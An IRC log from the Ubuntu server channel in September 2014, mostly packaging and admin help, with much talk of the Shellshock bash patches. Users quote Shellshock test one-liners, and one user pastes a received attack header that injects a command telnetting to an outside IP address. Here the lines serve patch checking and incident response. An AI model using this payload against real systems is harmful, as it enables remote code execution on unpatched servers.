<sarnold> Maxel: if you choose to use that, note that cron can be tricky due to different environment variables set by default in interactive shells. just give full pathnames to everything and you'll avoid most of the issues.
<Maxel> sarnold, yeah I have been running into some issues since it is a java program I'm trying ot run and it seems to need to actually be in the dir of the program so the environment variables are all correct
<Maxel> so some things I've seen try to actually cd into the dir before executing, but it is not playing well with what I'm trying to do in the shell script. albeit I am a total newb with this stuff
<Patrickdk> hmm, I never downloaded the 14.04 iso
<Patrickdk> the only iso I had was one of the beta tests
#ubuntu-server 2014-09-25
<delinquentme> say I have a brand new instance of ubuntu ... and I want to install git ... TYPICALLY I need to $ apt-get update .. before doing this ... however that installs a ton of other stuff ... is there a way to ONLY get the packages I need to install git ?
<Patrickdk> ok, what is the REAL issue?
<Patrickdk> apt-get update, installs NOTHING, EVER
<Patrickdk> NEVER EVER
<Patrickdk> where is the logs of it INSTALLING TONS of crap?
<delinquentme> Patrickdk, apt-get update + apt-get upgrade
<Patrickdk> now your changing your statement
<Patrickdk> WHY would you run apt-get upgrade?
<Patrickdk> what does that have to do with installing git?
<delinquentme> Patrickdk, let me fire up an instance and get the failing message
<delinquentme> Patrickdk, preferrred paste service?
<delinquentme> https://gist.github.com/carlcrott/da81282980a8f8cdbe7a
<delinquentme> " has no installation candidate "
<Patrickdk> did you do a apt-get update
<delinquentme> Patrickdk, I know that will solve it but Im looking to run fewer operations
<Patrickdk> you ALWAYS must run apt-get update
<Patrickdk> it's REQUIRED
<Patrickdk> if you don't run it, you have your issue
<Patrickdk> you want to *install* packages that NO LONGER EXIST
<m_anish> Hi I am trying to setup an ubuntu server (to serve as an LTSP server) .. and I have 2 NICs .. one for the WAN where I get an IP thru DHCP, and one for the LAN which the server will manage
<m_anish> during install I'm being asked "Choose the primary network interface" which will be used during the setup, listing the 2 nics I have
<m_anish> which should I pick? WAN?
<m_anish> guess it shud be WAN, it's doing dhcp
<Thumpxr> Guys, could you tell me, why i dont see Ã¤,Ã¶,Ã¼ in my ssh client? my locales are all de_DE and i'm on UTF-8
<sarnold> Thumpxr: check out locale-gen on the server, perhaps de_DE.utf8 doesn't exist on the server?
<sarnold> Thumpxr: also check outputof 'locale', perhaps a shell script is setting stupid variables
<Thumpxr> sarnold: output of locale is everywhere the same "UTF8-de_DE" or sth like that. did the locale-gen.. must i relogin afterwards ?
<sarnold> Thumpxr: hmm, maybe...
<Thumpxr> sarnold: it worked. Thank you :)
<sarnold> sweet :)
<lordievader> Good morning.
<jamespage> zul, jdstrand: lp:~james-page/horizon/juno-b3-fixes
<jamespage> zul, jdstrand: there is a build of that in https://launchpad.net/~james-page/+archive/ubuntu/junk
<jamespage> it appears to work OK
<lynxman> jamespage: o/
<jamespage> hey lynxman
<lynxman> jamespage: ello ello :)
<jamespage> rbasak, ping re websocket clietn
<jamespage> rbasak, looking through hazmats requested jujuclient and deployer updates (which I've ignored for to long)
<jamespage> needs > 0.18 for websocket client and we only have 0.13 now - any thoughts?
 * rbasak looks to remind himself
<jamespage> rbasak, merging with debian looks good as we can drop your patches tests
<jamespage> rbasak, 0.18 unit tests OK and is fixes only over 1.16 as in debian
<rbasak> jamespage: looks OK to sync. Do need an FFe for this? I see only Juju, python-socketio-client and python-docker as reverse deps.
<rbasak> jamespage: for 0.18, Debian doesn't have it yet, but it is DPMT so maybe update Debian and sync?
<jamespage> rbasak, I'm not DPMT - maybe barry can
<jamespage> rbasak, yeah we can sync tho - the breaks/replaces is no longer required
<jamespage> rbasak, your reverse deps are correct
<rbasak> jamespage: agreed we can sync - b/r was in Trusty, so all supported upgrade paths should be fine.
<jamespage> rbasak, it probably does need a FFe I think
<rbasak> jamespage: there is a testsuite, so that should mitigate any regression.
<jamespage> rbasak, yah
<jamespage> rbasak, I pinged barry in #ubuntu-devel
<rbasak> hallyn: fyi, I've uploaded your fix for bug 1372368 as a workaround for now at least. I think there's a much deeper libvirt bug though. I'm still looking into it.
<uvirtbot> Launchpad bug 1372368 in uvtool "VM creation fails on Utopic" [High,Triaged] https://launchpad.net/bugs/1372368
<zul> jamespage: +1 for horizon, although I think the README.Debian should be updated to reflect how you generated the xstatic tarball
<jamespage> zul, ok - ack
<jdstrand> jamespage: looked at the debian/changelog. that seems fine to me. it is more like what we have now. you can make sure the right xstatic packages are available. nothing else will start using them
<jdstrand> jamespage: thanks for working on that!
<jamespage> jdstrand, np - I just added a README.source to explain why and how to use all that stuff
<jdstrand> nice
<rbasak> jamespage: while you're working on horizon, have you seen https://code.launchpad.net/~cjohnston/ubuntu/utopic/horizon/1308651/+merge/235741 ?
<Azaril> hey guys]
<Azaril> looking at unattended-upgrades
<Azaril> what does "sudo dpkg-reconfigure -plow unattended-upgrades" do exactly?
<Azaril> is the only thing the creation of 20auto-upgrades, 50unattended-upgrades
<Azaril> ?
<Scrix0> Hello, I am looking for assistance with nfs userid mapping
<juice23> Can somebody explain Ubuntu's support policy for PHP 5.2. PHP 5.2 is discontinued upstream, but included in editions of Ubuntu server that are still supported. Did Canonical force users to upgrade to PHP 5.3 to continue receiving security updates? or what is the story with it? how does it differ from debian-lts as it is 'limited support' in debian-lts.
<mdeslaur> juice23: do you mean PHP 5.3?
<mdeslaur> juice23: we don't have 5.2 in any supported versions of Ubun
<mdeslaur> Ubuntu
<juice23> mdslaur: i thought 5.2 was in ubuntu 12.04 lts, or was. no?
<mdeslaur> juice23: no, 12.04 lts shipped with 5.3.10 to which we've been backporting all the security fixes
<juice23> mdslaur: and what about ubuntu 10.04 lts for server? even if it isn't 5.2 it would have been an earlier version that was discontinued.
<mdeslaur> 10.04 lts has 5.3.2 to which we backport security fixes
<mdeslaur> basically, we backport security fixes to whatever php version we shipped, whether or not the versions are discontinued upstream
<juice23> mdselaur: ok, so in other words i'll probably run into this problem again.
<mdeslaur> juice23: into what problem?
<juice23> mdeslaur: 10.04 lts wouldn't have shipped with 5.3.x though back in 2010. right?
<mdeslaur> juice23: yes, it originally shipped with 5.3.2, and we've backported all the security fixes to it since then
<jamespage> zul, just got enought of a +1 on #ubuntu release for that horizon upload
<jamespage> can you +1 my mp - https://code.launchpad.net/~james-page/horizon/juno-b3-fixes/+merge/235959
<jamespage> and I'll upload for release
<juice23> mdslaur: the problem is content management systems dependent on specific versions of php that are then discontinued by ubuntu and other distributions.
<mdeslaur> juice23: whatever version we ship a release with is supported for the lifetime of the release
<juice23> mdeslaur: OK, thanks for the info. i guess my choice of distribution was poor (well, maybe not, back when we setup the server in 2008, but currently).
<juice23> mdselaur: thanks, i think i might move to ubuntu then
<mdeslaur> juice23: np
<zul> jamespage:  +1ed
<Azaril> are there firewall rules to allow security updates through?
<Azaril> ie
<Azaril> whats the server ip i should allow?
<arrrghhh> most firewalls will block inbound traffic but are permissive for outbound... are you blocking outbound as well?
<arrrghhh> most firewalls by default I should say ^^
<ses1984> hi, i'm trying to get postfix installed and configured as a gmail smtp relay, and i'm running into some weird problems
<ses1984> http://paste.ubuntu.com/8426161/
<ses1984> i've tried to purge sendmail, and install --reinstall postfix, and for some reason, i can't get the postfix service to start
<ses1984> service postfix start *says* it's starting, but status says it's not running and the mail.err log says that port 25 is already bound
<arrrghhh> ses1984, have you checked what is hogging port 25 with netstat?
<ses1984> yes, it's in my paste, it says, 20604/sendmail: MTA, which i dont understand because i purged sendmail
<ses1984> but then i read that postfix includes a drop in sendmail binary so i dont know what i'm seeing...is *part* of postfix running but the postfix service is not?
<JayJ_> Anybody have any pointers on how to slipstream a driver into Ubuntu PXE server? My server need a RAID driver to see the volumes
<Azaril> arrrghhh: we are blocking outbound as well
<arrrghhh> Azaril, well then you need to determine how to allow that out I spose ;)
<arrrghhh> look at your apt source list, see which mirror you chose... and allow that host
<arrrghhh> choose*
<arrrghhh> maybe it's chose.  blah.
<Azaril> sure, but if i run an nslookup on security.ubuntu.com i get 7 ips
<arrrghhh> Azaril, might want to pick a specific mirror
<rostam> HI I am using ubuntu 14.04, where could I get the patch for ubuntu bash security issue? thanks
<bazzzb> sudo apt-get update && sudo apt-get upgrade
<rostam> bazzzb, thanks
<JayJ_> ANy help to preload a driver into ubuntu installation?
<dmsimard> Any ETA on the proposed patch to bash for it to merge to stable ?
<jdstrand> rostam: the main issue is fixed in http://www.ubuntu.com/usn/usn-2362-1/ . all you need to do is apply your regular security updates. a followup fix is forthcoming
<jamespage> jdstrand, we have a few new MIR's that are pending security team review - specifically pysnmp and kazoo - http://people.canonical.com/~ubuntu-archive/component-mismatches-proposed.svg
<jamespage> jdstrand, just checking these are on your list ;-)
<jdstrand> I'm not sure they are
 * jdstrand looks
<jamespage> jdstrand, thanks
<axisys> why would bash upgrade stuck at kernel dependecy?
<axisys> http://pastebin.com/RjFQ2gHd
<ogra_> where do you see bash in there ?
<jamespage> coreycb, can you unsubscribe ubuntu-release from the xstatic sync requests pls; we've agreed a different way forward for this cycle
<ogra_> your package system is messed up  and it wants to fix itself ... even "apt-get install foo" would have triggered that
<jrwren> axisys: nothing to do with bash, your apt is messed up to begin with.  apt-get remove linux-headers-server && apt-get install bash
<coreycb> jamespage, ok will do
<axisys> ogra_: I only have unattended upgrade running nightly for security patches
<jamespage> coreycb, fyi the approach was to embed the xstatic bits within horizon; using a multi orig.tar.gz approach
<axisys> jrwren: apt-get remove linux-headers-server won't hurt my server?
<axisys> jrwren, ogra_ : may be unattended upgrade broke it?
<jamespage> coreycb, https://launchpad.net/ubuntu/utopic/+queue/?queue_state=1&queue_text=horizon
<jrwren> axisys: they are header files, you only need them if you are compiling kernel modules.
<ogra_> axisys, no idea how it happened, but it isnt realted to bash
<jrwren> axisys: i don't know much about unattended upgrade.
<axisys> jrwren: did not let me remove the header
<axisys> jrwren: http://pastebin.com/CLP0rfg2
<axisys> jrwren: how do you address zero day exploit? I am using unattended for security to address just that
<jrwren> axisys: I don't sufficiently understand the vulnerability to do a risk assessment.
<ogra_> axisys, i dont get that, why dont you just let "apt-get -f install" do its job ?
<axisys> because it will try to remove a newer kernel than what I have
<axisys> ogra_: ^
<axisys> ogra_: My guess some upgrade is pending a reboot
<axisys> ogra_: and it will apply the newer kernel.. so I dont want to prematurely remove it
<ogra_> axisys, oh, you dont have 3.2.0-69 installed ?
<axisys> I am on
<axisys> 3.2.0-59-generic
<ogra_> well, it wont "just remove" kernels
<axisys> so those might be in the queue and pending to be applied
<ogra_> (it even tells you that you have to do that yourself)
<ogra_> your first paste:  http://pastebin.com/RjFQ2gHd
<ogra_> $ sudo apt-get install bash
<ogra_> ....
<ogra_> E: Unmet dependencies. Try 'apt-get -f install' with no packages (or specify a solution).
<ogra_> ... thats what i read in the first paragraph
<ogra_>  sudo apt-get -f install
<ogra_> ...
<ogra_> Use 'apt-get autoremove' to remove them. (your old kernels ... and only if you want to)
<ogra_> ...
<ogra_> and then it just wants to fix package conflicts for you
<ogra_> i donrt see anything related to your 3.2.0-59-generic
<jrwren> ogra_: to answer your question - i don't have CGI enabled. I'm the only user of my servers or all my server users are trusted. I haven't figured out where else I'd be vulnerable.
<ogra_> (if you are worried you can even hardcode the kernel in your grub config)
<axisys> ogra_: I am few kernel version behind.. so I would reboot first to make the change..
<axisys> but you guys already answered my question
<axisys> it is not bash dependcy .. it is apt related
<ogra_> yes, your local setup is a little out of sync
<axisys> ogra_: unattended upgrade might have a security update which forced the new kernel..
<ogra_> could be
<ogra_> that stil doesnt mean you need to run it :)
<axisys> http://www.ubuntu.com/usn/usn-2359-1/
<ogra_> it just wants to install it
<ogra_> to solve the packaging issues
<axisys> there are few linux kernel vulnerability from 23rd
<axisys> even APT vulnerability from 23rd
<RoyK> [offtopic] http://techreport.com/review/27062/the-ssd-endurance-experiment-only-two-remain-after-1-5pb/4 <-- interesting
<ikonia> RoyK: don't need the [offtopic] posts please, as you know
<LucidGuy> Need to order me a new 1U SuperMicro server to run Ubuntu 12.04..  finding it difficult to determine what hardware 12.04 will support.  Tips?
<ikonia> research the hardware
<LucidGuy> ikonia, thats what I'm doing.  Is there a simple way to list supported hardware?
<ikonia> no
<ikonia> the HCL is poorly maintained
<LucidGuy> for example where do these kernel modules come from /lib/modules/3.11.0xxxx/kernal/drivers  ?
<LucidGuy> Did my distribution bundle these in and create these during the install .. or some how from the kernel itself?
<RoyK> LucidGuy: why 12.04? 14.04 has been stable for a while
<LucidGuy> RoyK, we sit on an LTS for quite some time, no need to upgrade
<RoyK> 14.04.1 is LTS
<LucidGuy> I know
<RoyK> LucidGuy: I've used a lot of supermicro systems, and haven't had issues with drivers
<RoyK> last thing was setup with debian wheezy - no issues
<axisys> I have lots of supermicros running ubuntu server
<axisys> no issue either
<axisys> I even have systems with ssd
<axisys> with only SSDs
<LucidGuy> axisys, version of Ubuntu?
<axisys> Ubuntu 12.04.3 LTS
<RoyK> LucidGuy: I've used 10.04 and 12.04 and debian with those systems - no issues
<axisys> 64bit
<RoyK> (and obviously, 64bit)
<pmatulis> jamespage: do you know why slapd in utopic is still at 2.4.31 while debian unstable is at 2.4.39 ?
<budman> ubuntu 14.04 stuck booting after nonblocking pool is initialized
 * patdk-wk feels dirty
<jamespage> pmatulis, because no-one has noticed and merged it
<pmatulis> jamespage: so too late?
<jamespage> pmatulis, without looking at the upstream changelog I could not say - it would need a FFe from the release team and we are in final freeze now
<pmatulis> jamespage: ah well.  i thought these things were automatic
<Lapadine> anyone know how I can upgrade bash on saucy? it doesn't seem to want to, it is showing latest version as 4.2-5ubuntu3 which is vulnerable to "shell shock"
<lordievader> Lapadine: Saucy is EOL and won't receive updates.
<lordievader> Lapadine: You should upgrade to Trusty.
<Seveas> Lapadine: grab the sources from trusty/utopic and rebuild on saucy. Then do it again when the final fix is out :)
<keithzg> Man, that was far more harrowing than it should have been, updating bash on the old server we use as a router at work.
<keithzg> It was still running Bash 2.05b!
<Lapadine> do-release-upgrade == not fun over ssh...
<lordievader> Lapadine: Never had any trouble with it, it opens a screen anyhow.
<Lapadine> am running it in screen so should be ok, just dont like it
<keithzg> ehh, I've never had it fail. It opens a second ssh session you can connect to in case of failure, too.
<jamespage> pmatulis, not merges - sorry
<claude2> does anyone here know why snmpd wants to install mysql in 14.04?
<TJ-> claude2: It depends on "libmysqlclient18"
<claude2> but why is that and mysql-common necessary? that seems odd
<Lapadine> server unreachable :/ reboot seems to have failed....
<ayr-ton> My friends, how to use cloud-init to create ISOs? I do need to generate a bunch of images for a dark hypervisor.
<ikonia> what's a dark hypervisor ?
<ayr-ton> ikonia: A hypervisor with thousands of instances without openstack support.
<ikonia> I've never heard of a dark hypervisor before.
<dmsimard> Has the second bash patch hit the repos outside proposed yet ?
<mdeslaur> dmsimard: which one?
<mdeslaur> in stable releases?
<dmsimard> mdeslaur: The one you made :)
<mdeslaur> I pushed out the one for CVE-2014-6271 about 10 minutes ago
<uvirtbot> mdeslaur: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environmen
<mdeslaur> sorry, not that one
<dmsimard> mdeslaur: Looking to get the proposed patch in the stable branches for precise and trusty
<mdeslaur> I pushed out CVE-2014-7169 about 10 minutes ago
<uvirtbot> mdeslaur: GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP cl
<dmsimard> Right
<mdeslaur> uvirtbot: will you shut up
<uvirtbot> mdeslaur: Error: "will" is not a valid command.
<dmsimard> lol
<mdeslaur> uvirtbot: die
<dmsimard> So an apt-get update should get it ?
<uvirtbot> mdeslaur: Error: "die" is not a valid command.
<mdeslaur> dmsimard: yes, it'll take a few minutes for the mirrors to catch up
<mdeslaur> and the USN should be going out in about 5 minutes
<dmsimard> mdeslaur: Thanks for your work.
<mdeslaur> you're welcome
<mdeslaur> http://www.ubuntu.com/usn/usn-2363-1/
<Patrickdk> :)
<Patrickdk> my cache servers have it :)
<Patrickdk> now to repatch lenny and fc9 systems :(
<Patrickdk> why did they have to dump those onto me last month
<sarnold> fc9..
<Patrickdk> yes!
<Patrickdk> I'm suppost to migrate them
<Patrickdk> we where still in phase one, figuring out what they did, cause no one knew
<sarnold> did anyone propose "turn them off one at a time and see who screams"? .. cause fc9. wow.
<Patrickdk> :)
<Patrickdk> yes, they where all confirmed working and production
<Patrickdk> they had another cluster too
<Patrickdk> those where running ubuntu 13.10
<Patrickdk> those are halfway migrated
<Patrickdk> I just patched bash in it
<Patrickdk> and for fc9 :(
<Patrickdk> and lenny, and squeeze
<Patrickdk> ovious what my day was spent doing :)
<hurin_> hello, sorry, i'm just a newbie looking for some help about how i should configure my apache2 in the purpose to get my vhost working, i'm trying to do so since 2 hours and 3 tutorials and i still can't figure out what's going on
<sarnold> hurin_: this guide is well-suited to the ubuntu / debian configuration style: https://help.ubuntu.com/14.04/serverguide/httpd.html
<hurin_> whatever i'm doing i still see only my default virtual host, even if i write my virtual hosts name,...
<hurin_> sarnold: i'm going to look at it, thank you
<sarnold> hurin_: is there anything interesting in the apache logs?
<hurin_> sarnold: no, all i see are http 200, as if all was working perfectly
<hurin_> but i keep see only my default website, and never any of my vhosts
<MrPPS> any of you folks know off-hand if there's a regex to grep for checking to see if any "shell shock" exploits have been attempted?
<sarnold> MrPPS: pals were grepping for :; in their apache logs earlier, finding all kinds of fun things
<MrPPS> sarnold: I'll take a look, thanks kindly :)
#ubuntu-server 2014-09-26
<mdev> any word when a working shellshock patch will be released/
<mdev> other distros apparently have a working one
<sarnold> mdev: 12.04 LTS should be fine; 14.04 is under investigation now, no ETA
<mdev> weird they'd fix ancient version first, but ok thanks
<sarnold> mdev: to be honest we thought we fixed them all at the same time :/
<ajmitch_> sarnold: fwiw, looking at the build log, bison wasn't being called to process parse.y for 4.3
<sarnold> mdeslaur: ^^^
<ajmitch_> probably didn't help that the build system changed a bit between versions
<mdev> yeah I installed the first patch, still vulnerable to
<mdev>  env -i  X='() { (a)=>\' bash -c 'echo date'; cat echo
<mdev> creates file echo, so yeah
<mdev> seems like new patch works
<mdev> is this accurate?
<mdeslaur> mdev: which one?
<mdev> dpkg -s bash | grep Version
<mdev> Version: 4.3-7ubuntu1.3
<mdeslaur> yep, that should be the fixed version
<mdev> http://askubuntu.com/a/528466
<mdev> used security repo
<mdev> great thanks
<mdeslaur> I just pushed it out as a security update, the USN will be published in a couple of minutes
<mdev> nice work mdeslaur
<mdev> you helping ton of people/companies, seen guy in #bash earlier freaking out he was going to get fired because no working patch and he told his boss it was fixed
<mdev> so now he should be good, pretty sure he used ubuntu
<mdev> nevermind but still! thanks
<mdeslaur> you're welcome :P
<zzxc> Alright so I'm sure this is pop up all over the place. Is there a way to test for the shellshock bug?
<lordievader> Good morning.
<lkthomas> hey guys
<lkthomas> can I use MAAS to provision workstation ?
<sarnold> lkthomas: you may want to check in #maas for details; I have an idea that it'd be alright for workstations that you don't mind spending a few minutes to reclaim and provision each time..
<lkthomas> sarnold: mind to move this topic to #maas ?
<Nettoe> how do u test bash security with the new exploitation?
<sarnold> nettoe: we've been using:  env -i X='() { (a)=>\' bash -c 'echo date'; cat echo ; rm echo
<Nettoe> and should it show?
<Nettoe> output?
<sarnold> if it's still broken you'll get the date in a file named 'echo' -- if it is fixed, there won't be any date output and there won't be an 'echo' file
<Nettoe> sarnold: I get "echo date: command not found"
<sarnold> Nettoe: that's unexpected :)
<sarnold> Nettoe: here's output after installing the fix: http://paste.ubuntu.com/8431074/
<Nettoe> sarnold: or sorry, I got bash: X: line 1: syntax error near unexpected token `='
<Nettoe> sarnold: when updating bash I get an error
<Nettoe> sarnold: package is in a very bad inconsistent state
<sarnold> Nettoe: can you pastebin the error?
<Nettoe> sarnold: http://pastebin.com/HQWw44nr
<Nettoe> sarnold: samething if I update from aptitude
<sarnold> Nettoe: on a -guess- I think you've clouded up your environment variables with this testing
<sarnold> Nettoe: try: sudo -i   -- then try the upgrade command in that shell
<Nettoe> what I do is just apt-get --reinstall install bash
<Nettoe> sarnold: what does sudo -i do?
<sarnold> Nettoe: it clears the environment.
<Nettoe> oh okei
<Nettoe> thank you
<Nettoe> sarnold: thanks alot man!
<sarnold> Nettoe: fixed?
<Nettoe> sarnold: I'm greatly in your dept forever
<sarnold> sweet :) have fun
<Nettoe> sarnold: yes, now the bash testing shows correct=)
<sarnold> Nettoe: nice. now bed time. :)
<Nettoe> sarnold: have a great night!=)
<sarnold> :)
<abhaykadam> doing 'aptitude install apache2' says you have unmet dependencies, and then it lists bunch on depending virtual pacakages, but system is unable to install it
<Thumpxr> abhaykadam: try sudo apt-get -f install
<abhaykadam> @Thumpxr, i tried it, but it didn't work
<abhaykadam> i reinstalled the server, with lamp-server selected :)
<ochoroch> Good morning ...
<ochoroch> i have installed ubuntu 14.04 on Hyper-V. It worked, but the disk shows I/O errors after some days.
<ochoroch> anyone have it running under Hyper-V?
<radish_> hello everyone. I did patch for http://www.ubuntu.com/usn/usn-2363-1/ on about 100 systems, but on one my test still turns out vulnerable: X='() { function a a>\' bash -c echo; [ -e echo ] && echo "vulnerable"
<radish_> can anyone confirm that after bash was patched, the command is still successfull?
<rbasak> radish_: please confirm the package version of bash that you have on a system that still appears vulnerable.
<rbasak> radish_: "dpkg-query -W bash"
<radish_> rbasak: it's 4.2-2ubuntu2.3 which should be the patched version
<rbasak> radish_: and is the shell you're testing in a new invocation of bash?
<cfhowlett> rbasak, what *should* the bash version be?
<radish_> rbasak: I did reboot the server to be really sure it's a new process
<rbasak> cfhowlett: http://www.ubuntu.com/usn/usn-2363-2/
<cfhowlett> rbasak, thanks
<rbasak> Also http://www.ubuntu.com/usn/usn-2363-1/
<radish_> rbasak: weirdly enough, it's the only server acting this way out of ~65 ones with ubuntu 12.04
<radish_> rbasak: checked the md5sum as well, it's the same one as on other systems which don't execute the exploit
<eNTi> hi. i got to ask, since its very difficult to get any definitv answer does bash 4.2ubuntu2.3 fix the bash vuln for good?
<eNTi> maybe put in your topic, if it does? :D
<rbasak> radish_: try md5sum (really you should be using sha256sum for security verification) on /proc/$$/exe
<rbasak> eNTi: the latest security update versions listed in https://launchpad.net/ubuntu/+source/bash are current.
<rbasak> (4.3-9ubuntu3  for Utopic)
<radish_> rbasak: did compare sha256 sum as well
<rbasak> radish_: specifically use /proc/$$/exe though, to ensure /bin/bash and not /usr/bin or /usr/local/bin or soemthin
<TJ-> eNTi: The updates are in the topic... of #ubuntu-hardened, the security channel
<eNTi> rbasak, TJ- thx.
<abhishek> how can iincrease space of /opt directory
<catphish> abhishek: is it a separate partition, lvm?
<SthNotTaken> "() { :;}; /bin/bash -c \"telnet 197.242.148.29 9999\"" <---This is a header I was passed. My server's response was larger than it should be (156k vs. a normal 39k). What do I do now?
<soren> SthNotTaken: You've heard of the bash vulnerability, right?
<catphish> SthNotTaken: why are you running " /bin/bash -c \"telnet 197.242.148.29 9999\"
<SthNotTaken> I've just patched for it. But this happened beforehand.
<SthNotTaken> I didnt know I was.
<abhishek> it is not separate partition
<abhishek> niether lvm
<catphish> abhishek: then you just need a bigger hard disk (obviously)
<radish_> rbasak: exe points to /bin/bash
<abhishek> actually Ican't mount storage to this server
<catphish> SthNotTaken: oh, someone else ran that against your server? probably best to double check you're patched, run some tests
<SthNotTaken> I already did patch and run tests.
<SthNotTaken> How do I find out what happened?
<abhishek> sry I have ample space in my SAN I can mount storage to thisserver
<abhishek> sry catphish!
<soren> SthNotTaken: You probably don't. Assume the worst.
<SthNotTaken> I'll try HTOP
<radish_> rbasak: will try an upgrade to 14.04 and see if the problem still persists, will report back
<TJ-> SthNotTaken: As I said in #ubuntu: SthNotTaken: Isolate it, then check logs carefully for indications of what the reverse telnet session was used for.
<SthNotTaken> I'm checking netstat -tupan
<TJ-> SthNotTaken: "/var/log/auth.log" should show if the attacker tried to run elevated command privileges
<TJ-> SthNotTaken: Is telnet client installed on the sever?
<TJ-> s/sver/server/ ?
<SthNotTaken> ... I wouldn't know how to check.
<SthNotTaken> 14.04LTS default
<TJ-> SthNotTaken: "which telnet", "dpkg -S bin/telnet",  "apt-cache policy telnet"
<TJ-> SthNotTaken: I don't think the 'telnet' client package is installed by default for the ubuntu-server task; it'd be a sysadmin choice to do so
<SthNotTaken> auth.log is 16mb in 5 days :(
<SthNotTaken> auth.log.1 is 18MB... last used 9/21/2014. auth.log is 16mb last changed 9/26/2014
<TJ-> SthNotTaken: "tasksel --task-packages server | grep telnet" => "" - so not installed by default
<SthNotTaken> nothing... but did I just install telnet?
<TJ-> SthNotTaken: I gave you the commands to check that
<SthNotTaken> I don't know which ones do what
<SthNotTaken> I'm not sure what I'm looking for.
<SthNotTaken> Can someone else help me?
<SthNotTaken>  nano /usr/bin/telnet.netkit returns a bunch of lines despite: -bash: cd: /usr/bin/telnet: Not a directory
<radish_> is there any clean method to remove desktop (gnome) and/or GUI related packages (xorg etc.) from a server? According to tasksel, no meta-package was used for installation of these so I'm not sure about how to catch all of them to remove.
<MadsRC> You could delete every package manually - That that sounds tedious
<patdk-wk> hmm? doesn't removing ubuntu-desktop get most of it?
<patdk-wk> been a long time since I have bothered to do that
<MadsRC> It does remove a bunch, but not all if I remember correctly
<radish_> ubuntu-desktop isn't installed
<radish_> otherwise it wouldn't be an easy task
<MadsRC> unity-desktop? gnome-desktop ?
<MadsRC> *-desktop
<patdk-wk> apt-get remove .*desktop
<MadsRC> purge it instead
<patdk-wk> depends
<cfhowlett> !pureubuntu
<ubottu> If you want to remove all !Kubuntu packages or !Xubuntu packages and have a default !Ubuntu system, follow the instructions here: http://www.psychocats.net/ubuntu/pureubuntu
<TJ-> radish_: pick one of the low-level X server libraries that everything else depends on, then remove it ... everything depending on it will be removed too :)
<patdk-wk> install http://i.imgur.com/BPGsKbc.jpg :)
<hallyn> stgraber: jdstrand needs a new lxc in utopic to accomodate a Breaks in apparmor package.  I can push an lxc with just the apparmor changes he wanted - you're not ready to push the new lxc yet right?
 * jdstrand can also back out the Breaks, but that would require another upload to add it back in later
<stgraber> hallyn: I'm not completely ready, currently my best guess is Monday and that's assuming I can get a FFe, so I'd say go ahead
<zul> hallyn:  new lxc as in ovs support?
<gidogeek> Hi, I'm having some trouble setting up postfix on one of my servers, I have (near) identical configuration between 2 servers, 1 works, other doesn't. THe one that works is Ubuntu 14.04 with Postfix 2.11 and the one that doesn't work is Ubuntu 12 with postfix 2.9.6. I can send e-mails but I can't receive them. The only difference in configuration is the domain
<gidogeek> http://mxtoolbox.com reports correct DNS setting but can't connect to SMTP on the Ubuntu 12 one, but can connect on the 14.04 one
<gidogeek> which leads me to suspect a firewall issue, I can however telnet to it on port 25
<gidogeek> any other suggestions for debugging ?
<hallyn> zul: yes it should have that
<zul> hallyn:  oh goody
<hallyn> jdstrand: ok, so I needed a Depends in lxc bc it needs the newer apparmor it breaks without it.  I guess we should have stuck with that :)  I'm still waiting for stgraber's ack on the second apparmor patch upstream.
<hallyn> technically the Breaks you put in wasn't equivalent I guess :)
<jdstrand> hallyn: you shouldn't need that I don't think
<jdstrand> hallyn: lxc never had a Depends on apparmor
<hallyn> hm, true
<hallyn> ok, i'll push in a few mins
<jdstrand> hallyn: you are probably seeing this issue because the apparmor that introduced the breaks isn't in the archive for download
<hallyn> jdstrand: seeing what?
<jdstrand> hallyn: the breaks make it so that apparmor will be updated prior to lxc if they are updated at the same time
<jdstrand> hallyn: I assume you saw an issue since you felt compelled to add the Depends
<hallyn> jdstrand: I didn't add a depends.  It was just how I was thinking the problem would've been fixed.  but anyway,
<hallyn> waht's the bug# again for this stuff?
<jdstrand> if not, just leaving the Depends in lxc as is should be fine (we do the same thing with lightdm, which also doesn't have a Depends on apparmor and it has unix rules)
<hallyn> I'm not adding a depends to lxc
<jdstrand> ok cool
<jdstrand> bug #1373555
<uvirtbot> Launchpad bug 1373555 in apparmor "please restrict signal, ptrace and unix mediation to the container" [Undecided,Fix committed] https://launchpad.net/bugs/1373555
<hallyn> thanks
<jdstrand> thank you! :)
<jdstrand> hallyn: can you ping me when you upload it?
<hallyn> sure
<hallyn> just running some new tests
<jdstrand> cool
<hallyn> jdstrand: hm, i dunno.  does lxc also needs a Breaks on the earlier apparmor?
<hallyn> I don't see how the apparmor Breaks on older lxc can force apparmor to be updated first, if user has an older apparmor
<stgraber> oh, not that again, we already had that discussion with the past two apparmor changes
<stgraber> you need to bump LXC's dependency on the new apparmor to ensure that when it's installed, the new stanzas are supported and the parser doesn't fail. And you need to have apparmor break lxc to ensure people don't update apparmor without lxc
<stgraber> hallyn: there's a versioned dependency against apparmor in LXC, but it's a generated one, you won't find it in debian/control but in debian/rules instead
<stgraber> it has logical for per-release minimal version
<stgraber> *logic
<stgraber> hallyn: I also replied to the second patch with a bunch more questions
<kyle__> Does the ubuntu installer support the partman/early_command?  I'm not having much luck with it.
<hallyn> who had that discussoin with the past two apparmor changes?  I think i sat those out
<hallyn> jdstrand: are you on the lxc-devel m-l by chance?  I don't want to put words into your mouth.
<hallyn> stgraber: the mysqld socket concern again seems unfounded, so long as it' sa named unix socket
<hallyn> as for ""what it buys is" I'd prefer jdstrand elaborate.
<hallyn> s/is/us/
<jdstrand> hallyn: I am not, but I put that in the bug: "Obviously, namespaces are intended to block these accesses in and of themselves, but this add an incremental improvement and security in depth in case something goes wrong there"
<jdstrand> grammatical error aside...
<stgraber> yeah, my worry here is that this is just a safety net for the case where the kernel has already gone massively wrong and that safety net appears to cause breakage for advanced use cases which may lead to people opting to either turn off apparmor for the container or for their own tool, which in either case is much worse than status quo
 * stgraber writes down a bunch of scenarios that appear to be made impossible by those extra (and mostly unneeded) restrictions
